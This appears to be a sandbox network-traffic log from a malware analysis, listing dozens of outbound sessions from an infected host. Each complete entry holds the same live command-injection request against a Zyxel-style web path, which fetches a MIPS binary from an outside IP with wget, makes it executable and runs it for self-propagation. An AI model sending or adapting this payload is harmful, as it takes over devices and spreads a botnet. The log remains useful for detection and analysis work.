                                                244192.168.2.2354514184.116.8.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501491070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                245192.168.2.2341744223.216.13.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507467031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                246192.168.2.23510881.254.124.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507524014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                247192.168.2.2332876169.95.61.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507576942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                248192.168.2.2346114170.147.246.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507576942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                249192.168.2.2350474142.68.113.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507597923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                250192.168.2.2344240161.34.93.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507632017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                251192.168.2.23331941.71.18.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507638931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                252192.168.2.233518666.182.162.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507673979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                253192.168.2.2343372181.116.101.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507680893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                254192.168.2.2356372142.63.63.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507704973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                255192.168.2.2358904188.50.61.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507740974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                256192.168.2.235761689.49.185.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507895947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                257192.168.2.2336428160.56.235.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507946014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                258192.168.2.2355404112.188.167.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507966042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                259192.168.2.2359018210.201.18.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507966995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                260192.168.2.2343990149.200.194.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.507997036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                261192.168.2.2341242155.74.153.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.508024931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                262192.168.2.2336122121.249.85.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.508045912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                263192.168.2.2334960206.11.140.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:52.508064985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                264192.168.2.2349912199.144.242.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:53.526962996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                265192.168.2.2340948200.55.100.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:53.526993036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                266192.168.2.234560271.248.16.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:53.527020931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                267192.168.2.235932071.2.181.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:53.527045012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                268192.168.2.233738845.195.77.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:53.527101040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                269192.168.2.2344066191.54.208.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:53.527184963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                270192.168.2.2360990146.107.154.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:53.527235985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                271192.168.2.235033692.53.148.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530016899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                272192.168.2.2341586166.11.220.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530072927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                273192.168.2.2333860107.206.153.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530088902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                274192.168.2.2342748207.205.249.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530092955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                275192.168.2.2358754190.118.42.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530122995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                276192.168.2.234528424.52.80.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530137062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                277192.168.2.2360904155.114.6.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530237913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                278192.168.2.233350824.166.45.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530280113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                279192.168.2.2347420132.69.173.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530317068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                280192.168.2.2335236118.175.119.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530319929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                281192.168.2.2335174188.93.14.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530344009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                282192.168.2.2359114209.224.102.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530374050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                283192.168.2.2359226128.142.162.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530410051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                284192.168.2.23481208.229.244.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530467987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                285192.168.2.234419866.204.52.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530491114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                286192.168.2.2336860122.98.241.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:54.530563116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                287192.168.2.2342148140.66.254.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:55.533071995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                288192.168.2.2350968107.232.55.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:55.533122063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                289192.168.2.2358746114.87.200.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:55.533139944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                290192.168.2.2346746167.197.38.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:55.533143044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                291192.168.2.233567834.73.70.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:55.533163071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                292192.168.2.2360800159.169.94.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:55.533200979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                293192.168.2.2360018111.205.238.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:55.533215046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                294192.168.2.2341956199.135.140.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:55.533221960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                295192.168.2.234368495.6.145.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:55.533256054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                296192.168.2.234946690.19.109.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:55.533272028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                297192.168.2.2333206157.250.220.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:55.533313990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                298192.168.2.234394851.138.224.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:56.536379099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                299192.168.2.2355984190.196.159.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:56.536418915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                300192.168.2.233867271.166.36.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:56.536433935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                301192.168.2.235000449.25.110.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:56.536441088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                302192.168.2.236074691.181.192.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:56.536513090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                303192.168.2.2333062204.191.67.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:56.536555052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                304192.168.2.2350478120.73.29.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:56.536588907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                305192.168.2.234854678.14.179.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:57.539401054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                306192.168.2.234192457.243.190.120443
                                                TimestampBytes transferredDirectionData
